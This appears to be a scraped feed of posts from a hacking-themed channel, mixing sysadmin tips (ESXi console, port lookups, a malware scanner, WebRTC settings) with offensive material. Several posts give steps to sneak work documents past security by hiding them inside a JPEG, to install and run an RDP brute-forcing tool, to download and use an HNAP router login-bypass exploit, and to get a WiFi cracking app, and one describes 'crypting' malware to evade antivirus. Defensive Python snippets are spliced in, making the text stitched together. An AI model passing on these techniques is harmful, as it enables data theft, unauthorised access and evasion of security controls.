UNDERCODE COMMUNITY
Forwarded from UNDERCODE NEWS
All Ubuntu users should update their systems now.
A new vulnerability in Ubuntu gdm3 could allow attackers to gain root access.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🖧 Accessing the ESXi console screen (DCUI) from an SSH session:

1) SSH access to the ESXi host is required.
Before accessing the DCUI from an SSH session, note that changing the network settings may cause management issues via vCenter Server, vSphere Client, or SSH.
Network changes should only be made through a console session (e.g. DRAC, iLO, KVM) to avoid host management issues.

2) Changing the network settings using this command may render the host unusable and may require a reboot to recover.

Run this command to access the DCUI from an SSH session:

~ # dcui

3) To exit the DCUI, press Ctrl + C.

The DCUI screen shown in the SSH session is colorless.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑How To Build Mobile App Without Programming - Build 14 Apps!
FREE


Build Audio App
Build Mortgage Calculator App
Build Count Down Timer App
Build Email Marketing App
Build Messenger App - With Google and Facebook Login Features
Build Slot Machine App
Build Voice Recorder App
Build Global Positioning System (GPS) App
Build Photo Sharing App
Build eBook App - Turn any PDF into eBook App
Build News Feed App
Build Memory Game App
Build Push Notifications App
Build Geo-Fencing App
Build Facebook App
Bypass Mobile App's Web Page Link to Mobile App Link
Customize Mobile App Tap - Better User Interface (UI) Design and Better User Experience (UX) Design
Discover Mobile App Monetization Secrets
Discover Precaution Steps That Need To Be Taken on Live Ads
Learn How To Use Google Analytics To Track Mobile App Activity
Learn How To Use Adobe Photoshop and Adobe Illustrator in Just 20 Minutes!
Discover Online Tool To Quickly Generate Different Sizes of Mobile App Icons
Discover Ways To Engage With Mobile App Users
Learn How To Export Application Binary and Upload to Multiple Mobile App Stores

https://www.udemy.com/course/how-to-build-mobile-app-without-programming-skills/
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to quietly take a document from work👨‍⚕️

1) So, once again, the strict officers from the security department are preventing you from taking documents out of work? How do you transfer the document you need to yourself without getting caught?

2) The main idea is to make the document look like a harmless picture, so that it can be sent by mail or copied to a USB flash drive without fear of being noticed. The security staff will only see that all actions were performed with a picture.

3) So, we have at our disposal a file with work-related information, “Doc.rtf”, and a picture, “picture.jpg” (this can be a photo from a corporate event, a volunteer clean-up, etc.).

4) First, we archive the text file with an archiver (in the example I used 7-zip) in the “.rar” format and get Doc.rar.

5) Now, to glue them together, we type in the command line:

D:\shared> copy /b picture.Jpg + doc.rar rezult.jpg
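
Seen from the defender's side, a file built this way is an ordinary JPEG with archive bytes after its end-of-image marker, which a mail gateway or DLP check can test for. The Python sketch below is an added example, not part of the original post; it walks the JPEG segments (so thumbnail markers inside an EXIF segment do not fool it) and reports any data found after the image. The function names and the sample bytes are constructed for illustration.

```python
# Signatures of archive formats that can be appended to an image.
ARCHIVE_MAGIC = {b"Rar!\x1a\x07": "rar", b"PK\x03\x04": "zip",
                 b"7z\xbc\xaf\x27\x1c": "7z"}
# Inside scan data, 0xFF followed by these bytes is not a segment marker:
# 0x00 is byte stuffing, 0xD0-0xD7 are restart markers.
IN_SCAN = {0x00, *range(0xD0, 0xD8)}

def jpeg_end(data: bytes) -> int:
    """Walk JPEG segments and return the offset just past the EOI marker."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: SOI marker missing")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xD9:                       # EOI: end of image
            return pos + 2
        if pos + 4 > len(data):
            break
        pos += 2 + int.from_bytes(data[pos + 2:pos + 4], "big")
        if marker == 0xDA:                       # SOS: skip entropy-coded scan
            while pos + 1 < len(data) and not (
                    data[pos] == 0xFF and data[pos + 1] not in IN_SCAN):
                pos += 1
    raise ValueError("truncated JPEG: EOI marker not found")

def appended_data(data: bytes):
    """Return (offset, kind, size) of bytes after the image, else None."""
    end = jpeg_end(data)
    tail = data[end:]
    if not tail.strip(b"\x00"):
        return None                              # nothing, or zero padding only
    for magic, kind in ARCHIVE_MAGIC.items():
        if magic in tail:
            return end + tail.index(magic), kind, len(tail)
    return end, "unknown", len(tail)

def sample_jpeg() -> bytes:
    """Constructed minimal JPEG-shaped byte string (not a viewable image)."""
    app1 = b"\xff\xe1" + (8).to_bytes(2, "big") + b"\xff\xd8\xff\xd9zz"
    sos = b"\xff\xda" + (3).to_bytes(2, "big") + b"\x00"
    scan = b"\x12\xff\x00\x34\xff\xd0\x56"
    return b"\xff\xd8" + app1 + sos + scan + b"\xff\xd9"

if __name__ == "__main__":
    glued = sample_jpeg() + b"Rar!\x1a\x07\x00" + b"payload"
    print(appended_data(sample_jpeg()), appended_data(glued))
```
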

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FREE WIFI CRACKER APPLICATION FOR ANDROID:

Step 1: Before using this application, you have to FORGET your current wifi connection; otherwise the scan will not work and you will be unable to attempt a connection.


Step 2: Before you can view any networks around you, you must enable location services in your settings. Newer Android permissions require location services due to the network dealing with IP addresses.

> Download:
https://github.com/trevatk/Wifi-Cracker/tree/master/newAPK
https://github.com/trevatk/Wifi-Cracker/tree/master/oldAPK
https://github.com/trevatk/Wifi-Cracker

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🔍 What process is listening on a port on Windows?

A) Using the command line
Use the following command to find the process ID (PID) listening on port 443.

You can change this value to look for a different port.

netstat -aon | findstr ":443" | findstr "LISTENING"
Output:

TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 2180
TCP 127.0.0.1:44312 0.0.0.0:0 LISTENING 4620
TCP [::]:443 [::]:0 LISTENING 2180


The last column of the output displays the process ID.

The output shows the PIDs 2180 and 4620 for processes listening on port 443.

Use this process ID with the tasklist command to find the process name.

> tasklist /fi "pid eq 2180"
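
The findstr ":443" filter matches any line containing that text, which is why the 127.0.0.1:44312 row (PID 4620) shows up in the output above although it is a different port. The Python sketch below is an added example, not part of the original post: it parses `netstat -aon` output and compares the local port exactly, next to a function that mimics the substring filter. The sample rows and function names are constructed.

```python
# Constructed sample in the layout Windows `netstat -aon` prints.
SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       2180
  TCP    127.0.0.1:44312        0.0.0.0:0              LISTENING       4620
  TCP    10.0.0.5:50122         203.0.113.7:443        ESTABLISHED     3312
  TCP    [::]:443               [::]:0                 LISTENING       2180
  UDP    0.0.0.0:443            *:*                                    2180
"""

def substring_match(output, port):
    """Mimic findstr ":<port>" | findstr "LISTENING": plain substring tests."""
    needle = f":{port}"
    return {int(line.split()[-1]) for line in output.splitlines()
            if needle in line and "LISTENING" in line}

def listening_pids(output, port):
    """Return PIDs of TCP sockets whose local port equals `port` exactly."""
    pids = set()
    for line in output.splitlines():
        fields = line.split()
        # TCP rows have five fields: proto, local, foreign, state, PID.
        # UDP rows (no state column) and the header row are skipped.
        if len(fields) != 5 or fields[0] != "TCP" or fields[3] != "LISTENING":
            continue
        # rpartition handles 0.0.0.0:443 as well as bracketed IPv6 [::]:443
        _, _, local_port = fields[1].rpartition(":")
        if local_port == str(port):
            pids.add(int(fields[4]))
    return pids

if __name__ == "__main__":
    print("substring filter:", sorted(substring_match(SAMPLE, 443)))
    print("exact local port:", sorted(listening_pids(SAMPLE, 443)))
```
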

B) Using PowerShell Get-Process
The second method uses a PowerShell command to identify the process running on a specific port on Windows.

Start a PowerShell terminal and run the following command to find the name of the process running on port 443.

You can change the port number to check for other ports.

Get-Process -Id (Get-NetTCPConnection -LocalPort 443).OwningProcess

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑RDP HACKING
A script that automatically scans an address list for open port 3389, then selects a method and starts brute-forcing login/password pairs.

To work correctly, the script requires masscan, curl and FreeRDP to be installed.

INSTALLATION & RUN:

1) git clone https://github.com/getdrive/Lazy-RDP

2) cd Lazy-RDP && chmod +x hydra/configure hydra/hydra src/rdp_brute.sh patator.py start INSTALL

3) Installing dependencies

./INSTALL

4) Running the script

./start

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to operate HNAP:

There are a couple of tools available to operate the HNAP.

Hnap0wn

The Hnap0wn tool was introduced 10 years ago. This is an exploit to bypass the administrative login for HNAP-enabled D-Link routers.

1) Now it can be downloaded from the following links (the versions are not identical! In this tutorial I use the first one):

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11101.tar.gz
https://web.archive.org/web/20140727021850/http://www.sourcesec.com/Lab/hnap0wn.tar.gz
Download and unpack from the command line:

2) mkdir hnap0wn

3) cd hnap0wn

4) wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11101.tar.gz

5) tar xvzf 11101.tar.gz

6) This tool allows you to check if there is a vulnerability that allows you to perform actions without specifying a password, as well as view information from a device using a password or without a password if the device is vulnerable.

In the xml folder that comes with this program, there are several .xml files to do typical things.

🦑Example command:


./hnap0wn 172.24.98.25:8080 xml/GetWLanSecurity.xml

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ISPProtect - a malware scanner for websites:

A) ISPProtect contains 5 scanning engines:

- Malware scanner using the signature method.
- Heuristic analysis.
- Scan to show installation directories for legacy CMS systems.
- A scan that shows you all the legacy WordPress plugins of the entire server.
- Database content scanner that checks MySQL databases for potentially malicious content.

ISPProtect is not free software, but there is a free trial version that you can use without registration to test it or clean up an infected system.

B) ISPProtect requires PHP and ClamAV to be installed on the server; this should be the case on most hosting systems.

ClamAV is used by ISPProtect in the first scan layer with its own set of ISPProtect malware signatures.

C) If you don't have PHP installed yet run:

# apt-get install php7.0-cli clamav
On Debian or Ubuntu:

# apt-get install php7.2-cli clamav
Fedora or CentOS:

yum install php

D) To install ISPProtect run the following commands:

mkdir -p /usr/local/ispprotect
chown -R root:root /usr/local/ispprotect
chmod -R 750 /usr/local/ispprotect
cd /usr/local/ispprotect
wget http://www.ispprotect.com/download/ispp_scan.tar.gz
tar xzf ispp_scan.tar.gz
rm -f ispp_scan.tar.gz
ln -s /usr/local/ispprotect/ispp_scan /usr/local/bin/ispp_scan

E) To start ISPProtect, enter:

ispp_scan
The scanner automatically checks for updates, then prompts you for a key (enter "trial" here) and then prompts you for the path to the websites, usually /var/www.

Please enter scan key: <- trial
Please enter path to scan: <- /var/www

The scanner will start scanning. The scanning progress is displayed.

The names of the infected files are displayed on the screen at the end of the scan, and the results are saved in files in the ISPProtect installation directory for later use:

F) After the scan is completed, you will find the results also in the following files:
Malware => /usr/local/ispprotect/found_malware_20180605115005.txt
Wordpress => /usr/local/ispprotect/software_wordpress_20180605115005.txt
Joomla => /usr/local/ispprotect/software_joomla_20180605115005.txt
Drupal => /usr/local/ispprotect/software_drupal_20180605115005.txt
Mediawiki => /usr/local/ispprotect/software_mediawiki_20180605115005.txt
Contao => /usr/local/ispprotect/software_contao_20180605115005.txt
Magentocommerce => /usr/local/ispprotect/software_magentocommerce_20180605115005.txt
Woltlab Burning Board => /usr/local/ispprotect/software_woltlab_burning_board_20180605115005.txt
Cms Made Simple => /usr/local/ispprotect/software_cms_made_simple_20180605115005.txt
Mysqldumper => /usr/local/ispprotect/software_mysqldumper_20180605115005.txt
Starting scan level 1 ...
Scanning 3471 files now ...

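G) To run ISPProtect automatically as a nightly cron job, create a cron file with nano:

nano /etc/cron.d/ispprotect
and insert the following line (files in /etc/cron.d need the schedule fields before the user name; the ones shown here run the job at 03:00 every night and can be adjusted, and AAA-BBB-CCC-DDD stands for your license key):

0 3 * * * root /usr/local/ispprotect/ispp_scan --update && /usr/local/ispprotect/ispp_scan --path=/var/www --email-results=root@localhost --non-interactive --scan-key=AAA-BBB-CCC-DDD

To list the available command-line options, run:

ispp_scan --help

https://ispprotect.com/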

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to prevent WebRTC leaks in browsers?

1) Despite all this, WebRTC also poses a threat to online privacy and security.

So, WebRTC is not very good for online privacy, and you should disable it if you do not need it.

In Google Chrome or Chromium browser, the local IP address is automatically allocated by default on all desktop OS platforms, Windows, macOS and Linux.

2) In Firefox, however, the local IP address is exposed via WebRTC, but this can easily be fixed with plugins like uBlock Origin.

3) Some less popular browsers for Linux users, such as Falkon and Midori, use either WebKit or WebEngine as their rendering engine and are vulnerable to WebRTC leaks, and there is no easy way to fix this problem.

But the real threat is on the Android platform: the Android Chrome browser and many other popular browsers are affected by the WebRTC leak.

4) Even worse, there is no easy way to install plugins / add-ons on Android to prevent WebRTC leaks.

This is when you should be especially careful if you truly value your online privacy.

You can use Firefox beta on Android to install plugins like uBlock Origin.

🦑How to disable WebRTC in Firefox browser?

1) Enter in the address bar:

about:config


2) Click “Accept the Risk and Continue”

3) Enter in the search bar:

media.peerconnection.enabled


4) Double-click the value true so that it becomes false


@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🐧 Bash function for extracting file archives of various types:

A) Open your ~/.bashrc file:

$ nano ~/.bashrc
Add the following snippet at the end:

# Bash function to extract file archives of various types.
# "$1" is quoted everywhere so that file names with spaces work.
extract () {
    if [ -f "$1" ]; then
        case "$1" in
            *.tar.bz2) tar xjf "$1" ;;
            *.tar.gz) tar xzf "$1" ;;
            *.bz2) bunzip2 "$1" ;;
            *.rar) rar x "$1" ;;
            *.gz) gunzip "$1" ;;
            *.tar) tar xf "$1" ;;
            *.tbz2) tar xjf "$1" ;;
            *.tgz) tar xzf "$1" ;;
            *.zip) unzip "$1" ;;
            *.Z) uncompress "$1" ;;
            *.7z) 7z x "$1" ;;
            *) echo "'$1' cannot be extracted via extract()" ;;
        esac
    else
        echo "'$1' is not a valid file"
    fi
}

B) Press Ctrl + o and press ENTER to save the file and then press Ctrl + x to exit the file.


C) Run the following command for the changes to take effect:
$ source ~/.bashrc
From now on, you can simply call this function to extract archives of various types.

For example, I'm going to extract a .7z archive file using the command:

$ extract archive.7z
Output example:

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_IN,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Core(TM) i3-2350M CPU @ 2.30GHz (206A7),ASM)

Scanning the drive for archives:
1 file, 16013693 bytes (16 MiB)

Extracting archive: archive.7z
--
Path = archive.7z
Type = 7z
Physical Size = 16013693
Headers Size = 1204
Method = LZMA:23
Solid = +
Blocks = 1

Everything is Ok

Folders: 21
Files: 37
Size: 16625007
Compressed: 16013693
Likewise, to extract .zip files, the command would be:
$ extract archive.zip

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Crypt / Why? / Issue price

Crypt, crypt - the process of hiding your malicious code from antiviruses (hereinafter referred to as AV).

> This is the process of modifying the code of your file (exe / dll) in such a way that the operability of the file itself is preserved and all antiviruses will consider that the file is harmless to the system.

> This is accomplished in a variety of ways. The simplest ones are adding garbage sections or false calls and jumps to the file code.

> This simplest method has long lost its relevance due to the development of antiviruses and logistic methods of file analysis (heuristic analysis).

> Now more complex methods are used, which include a huge complex of file modifications. And the more sophisticated the methods, the longer your file will remain "clean" for AV.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁